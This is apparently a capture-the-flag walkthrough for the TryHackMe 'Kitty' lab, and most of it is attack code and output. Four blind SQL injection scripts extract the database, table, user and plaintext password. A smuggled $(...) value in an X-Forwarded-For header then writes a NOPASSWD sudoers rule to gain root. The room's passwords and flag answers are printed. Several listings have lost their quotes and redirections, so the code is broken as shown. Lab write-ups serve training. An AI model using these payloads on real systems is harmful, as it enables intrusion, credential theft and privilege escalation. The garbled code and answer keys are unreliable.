Room Link : https://tryhackme.com/r/room/kitty
STEP1
nmap -p- -sSV 10.10.76.67 -Pn -T4 -A
FINDING
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
-------------------------------------------------------------------------------------------------------------
STEP2
nano /etc/hosts
10.10.143.247 kitty.thm
ctrl+x
y (confirm the save prompt)
enter
-------------------------------------------------------------------------------------------------------------
STEP2
http://kitty.thm/
http://kitty.thm/register.php
register
Enter (asad or 1=1-- -) as the login username and submit.
FINDING
SQL Injection detected. This incident will be logged!
-------------------------------------------------------------------------------------------------------------
STEP3
Use the Python script below to find the database name, one character at a time.
**********************************************************
# Boolean-based blind SQL injection helper: recovers the name of the current
# database one character at a time, using the size of the login response as
# the true/false oracle.
# NOTE(review): string quoting appears to have been lost when this listing was
# extracted (`probe = ...`, `url = ...`, the header keys/values, `result =`,
# `print(\033[K)`, `end=\r`); as printed it is not valid Python.
import requests
# Alphabet tried at each position.  It contains no newline, so the
# `elem != "\n"` check at the bottom of the loop is always true.
probe = +-{}(), abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
url = http://kitty.thm/index.php
# Browser-like headers copied from an intercepted login request.
headers = {
Host: kitty.thm,
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0,
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8,
Accept-Language: en-US,en;q=0.5,
Accept-Encoding: gzip, deflate, br,
Content-Type: application/x-www-form-urlencoded,
Origin: http://kitty.thm,
Connection: close,
Referer: http://kitty.thm/index.php,
Upgrade-Insecure-Requests: 1
}
# Prefix of the database name confirmed so far.
result =
while True:
for elem in probe:
# Injected via the login "username" field; the WHERE clause is true only
# when database() starts with the prefix found so far plus `elem`.
query = " UNION SELECT 1,2,3,4 where database() like {sub}%;-- -".format(sub=result+elem)
data = {
username: query,
password: 123456
}
# One POST per candidate character; redirects are followed, so the length
# measured below is that of the final page.
response = requests.post(url, headers=headers, data=data,allow_redirects=True)
#print("Size of Response Content:", len(response.content), "bytes")
# Oracle: a body of exactly 618 bytes is taken as "condition true".  The
# constant was observed on this target at the time of the run; any change to
# the page breaks it (matching a marker string would be more robust).
if(len(response.content) == 618):
result += elem
break
# The whole alphabet was tried without a match: assume the name is complete,
# clear the progress line and print the result.
if(elem == probe[-1]):
print(\033[K)
print(result)
exit()
# Progress display; the carriage return overwrites the previous guess.
# Detection note: the application reports logging injection attempts (see the
# STEP2 finding), so a run of this script plausibly leaves one flagged login
# POST per candidate character.
if(elem != "\n"):
print(result+elem,end=\r)
**********************************************************
python KittysqlGuessDb.py
FINDING
mywebsite -- db name
-------------------------------------------------------------------------------------------------------------
STEP4
Use the Python script below to find the table name, one character at a time.
************************************************
# Same blind-injection loop as the database-name script, but this time the
# injected query walks information_schema.tables for schema `mywebsite` and
# recovers a table name one character at a time.
# NOTE(review): string quoting appears to have been lost in extraction
# (`probe`, `url`, header keys/values, `result =`, the two print calls); as
# printed this is not valid Python.
import requests
# Alphabet tried at each position (no newline, so the final check is always true).
probe = +-{}(), abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
url = http://kitty.thm/index.php
# Browser-like headers copied from an intercepted login request.
headers = {
Host: kitty.thm,
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0,
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8,
Accept-Language: en-US,en;q=0.5,
Accept-Encoding: gzip, deflate, br,
Content-Type: application/x-www-form-urlencoded,
Origin: http://kitty.thm,
Connection: close,
Referer: http://kitty.thm/index.php,
Upgrade-Insecure-Requests: 1
}
# Prefix of the table name confirmed so far.
result =
while True:
for elem in probe:
# True only when some table in `mywebsite` starts with the prefix so far plus
# `elem`.  Plain LIKE is case-insensitive under MySQL's default collations, so
# the lower-case letters (tried first) match either case.
query = " UNION SELECT 1,2,3,4 FROM information_schema.tables WHERE table_schema = mywebsite and table_name like {sub}%;-- -".format(sub=result+elem)
data = {
username: query,
password: 123456
}
response = requests.post(url, headers=headers, data=data,allow_redirects=True)
#print("Size of Response Content:", len(response.content), "bytes")
# Oracle: a 618-byte body means "condition true".  Target-specific constant,
# observed during the author's run; fragile if the page changes.
if(len(response.content) == 618):
result += elem
break
# Alphabet exhausted without a match: treat the name as complete and print it.
if(elem == probe[-1]):
print(\033[K)
print(result)
exit()
# Progress display (carriage return overwrites the line).
if(elem != "\n"):
print(result+elem,end=\r)
************************************************
python KittysqlGuessTbl.py
FINDING
siteusers -- tbl name
-------------------------------------------------------------------------------------------------------------
STEP5
Use the Python script below to find the user name, one character at a time.
************************************************
# Same blind-injection loop again; here the injected query reads the
# `siteusers` table (found in STEP4) and recovers a username one character
# at a time.
# NOTE(review): string quoting appears to have been lost in extraction; as
# printed this is not valid Python.
import requests
# Alphabet tried at each position (no newline, so the final check is always true).
probe = +-{}(), abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
url = http://kitty.thm/index.php
# Browser-like headers copied from an intercepted login request.
headers = {
Host: kitty.thm,
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0,
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8,
Accept-Language: en-US,en;q=0.5,
Accept-Encoding: gzip, deflate, br,
Content-Type: application/x-www-form-urlencoded,
Origin: http://kitty.thm,
Connection: close,
Referer: http://kitty.thm/index.php,
Upgrade-Insecure-Requests: 1
}
# Prefix of the username confirmed so far.
result =
while True:
for elem in probe:
# True when some row's username starts with the prefix so far plus `elem`.
# Note the comment marker differs from the earlier scripts (` -- -` with no
# trailing semicolon); case-insensitive LIKE, so the first matching user wins.
query = " UNION SELECT 1,2,3,4 from siteusers where username like {sub}% -- -".format(sub=result+elem)
data = {
username: query,
password: 123456
}
response = requests.post(url, headers=headers, data=data,allow_redirects=True)
#print("Size of Response Content:", len(response.content), "bytes")
# Oracle: a 618-byte body means "condition true" (target-specific constant).
if(len(response.content) == 618):
result += elem
break
# Alphabet exhausted without a match: treat the name as complete and print it.
if(elem == probe[-1]):
print(\033[K)
print(result)
exit()
# Progress display (carriage return overwrites the line).
if(elem != "\n"):
print(result+elem,end=\r)
*************************************************
python KittysqlGuessUsrNm.py
FINDING
kitty -- user name
-------------------------------------------------------------------------------------------------------------
STEP6
Use the Python script below to find the password, one character at a time.
************************************************
# Same blind-injection loop; the injected query now reads the `password`
# column of `siteusers` for user kitty and recovers it one character at a time.
# Defender note: the recovered value is used directly as the SSH password in
# STEP7, so the column evidently holds the password in plaintext — a prefix
# LIKE match like this would not work against a properly hashed column.
# NOTE(review): string quoting appears to have been lost in extraction; as
# printed this is not valid Python.
import requests
# Alphabet tried at each position (no newline, so the final check is always true).
probe = +-{}(), abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
url = http://kitty.thm/index.php
# Browser-like headers copied from an intercepted login request.
headers = {
Host: kitty.thm,
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0,
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8,
Accept-Language: en-US,en;q=0.5,
Accept-Encoding: gzip, deflate, br,
Content-Type: application/x-www-form-urlencoded,
Origin: http://kitty.thm,
Connection: close,
Referer: http://kitty.thm/index.php,
Upgrade-Insecure-Requests: 1
}
# Prefix of the password confirmed so far.
result =
while True:
for elem in probe:
# `like BINARY` forces a byte-wise (case-sensitive) comparison, which is why
# this script, unlike the username one, can tell upper- from lower-case.
query = " UNION SELECT 1,2,3,4 from siteusers where username = kitty and password like BINARY {sub}% -- -".format(sub=result+elem)
data = {
username: query,
password: 123456
}
response = requests.post(url, headers=headers, data=data,allow_redirects=True)
#print("Size of Response Content:", len(response.content), "bytes")
# Oracle: a 618-byte body means "condition true" (target-specific constant).
if(len(response.content) == 618):
result += elem
break
# Alphabet exhausted without a match: treat the value as complete and print it.
if(elem == probe[-1]):
print(\033[K)
print(result)
exit()
# Progress display (carriage return overwrites the line).
if(elem != "\n"):
print(result+elem,end=\r)
*************************************************
python KittysqlGuessBinryPasswd.py
FINDING
L0ng_liv3_KittY -- password
-------------------------------------------------------------------------------------------------------------
STEP7
ssh kitty@kitty.thm -- with password L0ng_liv3_KittY
ls -la
cat user.txt
FINDING
What is the user flag?
THM{31e606998972c3c6baae67bab463b16a}
-------------------------------------------------------------------------------------------------------------
STEP8
cd /
ls -la
cd opt
ls -la
cat log_checker.sh
FINDING
#!/bin/sh
# log_checker.sh as printed in the walkthrough.
# NOTE(review): the redirection operators appear to have been dropped by
# extraction — the `echo $ip /root/logged`, `done /var/www/development/logged`
# and `cat /dev/null ... logged` lines most likely contained `>>`, `<` and `>`.
# Each line of the logged file is interpolated, unquoted, into a `sh -c`
# command string.  Those lines come from the X-Forwarded-For header of web
# requests (STEP12 shows the header value landing in the file), so a line
# containing $(...) is executed by this script — the command injection used in
# STEP13, which evidently runs with enough privilege to write /etc/sudoers.
# Mitigation: never re-parse data through `sh -c`; append it with a single
# command that treats the value as a string, e.g. `printf '%s\n' "$ip"`.
while read ip;
do
/usr/bin/sh -c "echo $ip /root/logged";
done /var/www/development/logged
cat /dev/null /var/www/development/logged
-------------------------------------------------------------------------------------------------------------
STEP9
cd /var/www/development/
ls -la
cat config.php
FINDING
/* Database credentials. Assuming you are running MySQL
server with default setting (user root with no password) */
// NOTE(review): the comment above is stale — the defines below use user
// `kitty` with a password, for database `devsite` on localhost.  The
// credentials sit in plaintext under /var/www/development, readable by the
// low-privilege shell user (STEP9).  Quotes around the define() arguments
// appear to have been dropped by extraction.
define(DB_SERVER, localhost);
define(DB_USERNAME, kitty);
define(DB_PASSWORD, Sup3rAwesOm3Cat!);
define(DB_NAME, devsite);
-------------------------------------------------------------------------------------------------------------
STEP10
mysql -u kitty -p
Sup3rAwesOm3Cat!
NOT USABLE
-------------------------------------------------------------------------------------------------------------
STEP11
apache2ctl -S (displays the Apache HTTP Server's current virtual-host configuration. We see an instance listening on 127.0.0.1:8080 configured by dev_site.conf; this looks like our candidate.)
FINDING
127.0.0.1:8080 localhost (/etc/apache2/sites-enabled/dev_site.conf:2)
-------------------------------------------------------------------------------------------------------------
STEP12
curl 127.0.0.1:8080 -d "username=aaa or 1=1-- -&password=aaa" -H "X-Forwarded-For: test"
cat logged
test
FINDING
This means we can echo into any file with this command — instead of "test" we just need to write our own command.
-------------------------------------------------------------------------------------------------------------
STEP13
curl 127.0.0.1:8080 -d "username=aaa or 1=1-- -&password=aaa" -H "X-Forwarded-For: \$(echo kitty ALL=(ALL:ALL) NOPASSWD:ALL /etc/sudoers)"
sudo -l
enter kitty password -- L0ng_liv3_KittY
FINDING
User kitty may run the following commands on kitty:
(ALL : ALL) NOPASSWD: ALL
-------------------------------------------------------------------------------------------------------------
STEP14
sudo su root
whoami
root
cd /root
ls -la
cat root.txt
FINDING
What is the root flag?
THM{581bfc26b53f2e167a05613eecf039bb}
-------------------------------------------------------------------------------------------------------------